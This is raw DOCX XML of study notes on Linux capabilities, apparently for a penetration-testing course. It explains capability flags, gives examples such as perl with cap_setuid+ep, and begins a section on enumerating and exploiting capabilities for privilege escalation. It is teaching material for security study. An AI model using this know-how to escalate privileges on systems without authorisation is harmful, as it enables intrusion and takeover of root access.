          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can give it only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_dac_read_search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which lets it bypass file read permission checks—</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> letting it bind to network ports or kill other processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000234F">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002350">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Common capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002351">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each capability is named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_&lt;function&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Some key examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002352">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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cap_dac_read_search</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – bypass file read permission checks (used in your example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002353">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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cap_net_bind_service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – allows binding to ports &lt; 1024</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002354">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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cap_sys_ptrace</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – trace other processes (used in debugging or process inspection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002355">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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cap_setuid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – allows setting user ID (like what </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> does)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002356">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_93298nw0xzy1" w:id="312"/>
      <w:bookmarkEnd w:id="312"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002357">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The flags </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002358">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you see something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002359">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar = cap_dac_read_search=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means the tar binary has this capability:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Effective – the capability is active while the binary runs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Permitted – the capability is allowed to be used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000235F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The capability set is being explicitly set to only effective (E) and permitted (P).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002360">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any other possible flags (like inheritable, I) are cleared.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002361">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1159"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002362">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1159"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar = cap_dac_read_search=ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002363">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1159"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means tar has only cap_dac_read_search in its effective and permitted sets, nothing else.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002364">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002365">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The capability is being added to the existing set, instead of replacing it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002366">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other capabilities or flags it already had are preserved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002367">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002368">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl = cap_setuid+ep</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002369">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means perl already may have had other capabilities, and now cap_setuid is added to its effective and permitted sets without removing anything else.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In short:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=ep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → "Set the capabilities to exactly E and P" (replace whatever was there).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+ep </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ "Add E and P to what’s already there" (append without removing).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000236F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002370">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sfywprxlcnyr" w:id="313"/>
      <w:bookmarkEnd w:id="313"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities enumeration and exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002371">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002372">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 18.4.1. Abusing Setuid Binaries and Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002373">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002374">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities are extra attributes that can be applied to processes, binaries, and services to assign specific privileges normally reserved for administrative operations, such as traffic capturing or adding kernel modules. Similarly to setuid binaries, if misconfigured, these capabilities could allow an attacker to elevate their privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002375">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To demonstrate these risks, let's try to manually enumerate our target system for binaries with capabilities. We are going to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to perform a recursive search starting from the root folder </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
